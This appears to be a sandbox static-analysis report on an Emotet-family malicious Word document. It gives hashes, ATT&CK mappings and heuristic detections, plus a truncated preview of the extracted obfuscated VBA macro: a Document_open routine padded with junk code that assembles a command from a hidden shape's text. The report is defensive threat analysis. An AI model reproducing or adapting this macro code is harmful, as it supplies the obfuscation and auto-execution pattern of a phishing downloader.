Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 302d111df88971a8…

MALICIOUS

Office (OLE)

Size: 138.0 KB
Created: 2018-11-29 12:20:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 088e0aa1d899cc55046dcd2f1ae592a3
SHA-1: b40b2f3cb411e37f55d101d9019a50666160ff7b
SHA-256: 302d111df88971a8852fad6dcfc4463c0ee7cbddd465ac127c0702c59d2757cb
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for Emotet. The macro is designed to execute obfuscated code that attempts to download a second-stage payload from a hardcoded URL. The ClamAV detection further supports the Emotet family attribution.

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-6826479-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826479-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8337 bytes
SHA-256: 5a2351906a0d74bc5e31adb2360477d3a279bf6e5366cdf2357cebc97bf3729b

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "RhJhwiWpsPlYI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
      wQLTjhc = (QjEuC - Oct(ljtJicoLz) * JEDHiF - Sgn(104442554) - 71540570 + Fix(ihVuWp) + 3200385979# + 154192889 / 214673238 / oiMZjQUvV)
      Select Case tomRuJ
         Case 184398439
            VRKTtjX = CLng(118011713)
            oWTiEH = Int(KmzfXq)
         Case 90210813
            usRqu = Hex(27497285)
            MNSCO = CStr(242240221 * CByte(kcBOAjY))
End Select
Set ojWGHMwH = Shapes("jqjuiwKrbIw")
   On Error Resume Next
      ASVchnL = (hfiMOUiH - Oct(ioPVvRcz) * fGkBAC - Sgn(70988843) - 9390445 + Fix(BzHlBdcX) + 2472436359# + 223535494 / 26044258 / VfBVJimE)
      Select Case AtfOH
         Case 34914053
            jffBN = CLng(238090398)
            KismltX = Int(utkKaifr)
         Case 136244278
            zjADbWu = Hex(157700206)
            qGCCUlC = CStr(285894034 * CByte(RvAKjUzmi))
End Select
   On Error Resume Next
      zYTcHfq = (dirbPU - Oct(jzmZXz) * fRDFWM - Sgn(170590965) - 327701511 + Fix(RktMSTWS) + 3387221339# + 172474369 / 204673658 / dNmfs)
      Select Case AZYhwXi
         Case 291786573
            ZBIdt = CLng(207123179)
            ZrVIvPaU = Int(zUPCDQZ)
         Case 197826209
            ZYQjlWhZ = Hex(117091075)
            QrwlXonvJ = CStr(238965674 * CByte(lzEIBCO))
End Select
   On Error Resume Next
      rRwpW = (hspXzO - Oct(JoEiivsSK) * RApWvo - Sgn(279889657) - 150090942 + Fix(foJzMinU) + 1017392629 + 285902742 / 132391769 / razGHPHFv)
      Select Case mjHjoht
         Case 246688436
            zARjG = CLng(340217454)
            swuadaqN = Int(arQnYjR)
         Case 249027918
            Bcsjt = Hex(41700334)
            dnUwaqr = CStr(42266321 * CByte(XKKVwL))
End Select
   On Error Resume Next
      HizvDInfZ = (zQidMXLA - Oct(TUBOuRkUo) * dApQzT - Sgn(47563800) - 19589971 + Fix(JSvZC) + 546446919 + 136338330 / 103265492 / GszBDR)
      Select Case ZFQCdToz
         Case 70877379
            iHAfKFUHq = CLng(163736158)
            uzFaBRO = Int(WczXfZNrA)
         Case 178669456
            iwPGaNPmw = Hex(261609911)
            tMsMfGK = CStr(187302282 * CByte(CZDnUkj))
End Select
   On Error Resume Next
      HvOYGbMNl = (dEwDN - Oct(vUIrHzR) * swGBiU - Sgn(251046870) - 306638680 + Fix(lwudY) + 2513922549# + 225554716 / 189024678 / FVbcc)
      Select Case aSIRkHnH
         Case 196217770
            fIULj = CLng(112302493)
            iDLGTz = Int(iaOCtwi)
         Case 101981658
            ZaLMUKs = Hex(328828414)
            QZsdNQVo = CStr(18708819 * CByte(YRaGTljKs))
End Select
nfSRnplJZj = "" + miSHt + OUjAucfs + iTuHjXz + sbmpd + zZINLwk + ojWGHMwH.TextFrame.TextRange.Text + AEBLphw + fPoXHv + qjDGq + zSilUYjj
   On Error Resume Next
      vrwZnVCs = (zfwuHTX - Oct(CiAPwdb) * FcdIDWvfV - Sgn(95110193) - 329814231 + Fix(QkXXM) + 3374330829# + 309704176 / 248196837 / bIAlTI)
      Select Case vSwOUjisZ
         Case 235300878
            bjQYsVR = CLng(65775830)
            KcCzip = Int(dUdWjNw)
         Case 242003778
            RkljC = Hex(204167731)
            ddTCCCPfU = CStr(64730793 * CByte(nSQzfiLEY))
End Select
   On Error Resume Next
      zZjJITXP = (wicnSli - Oct(IhaSswHVL) * TZFLvUh - Sgn(327391050) - 159992539 + Fix(PzCZaWtOK) + 3165509549# + 268940923 / 17046362 / DabaQHaYo)
      Select Case uEpYnmHFU
         Case 89933549
            cKfBrVFs = CLng(74273158)
            kQiCkT = Int(RqzYbAHVk)
         Case 328517199
            cCqUo = Hex(42145847)
            PwYYlVj = CStr(192235408 * CByte(KnHWCSNo))
End Select
   On Error Resume Next
      rbRrqiTw = (LraMi - Oct(haIRZ) * IiIWwtQ - Sgn(29009368) - 102646753 + Fix(vDfvsmPiT) + 2581896189# + 27526179 / 41651882 / OqJwhMMX)
      Select Case iLizI
         Case 1
... (truncated)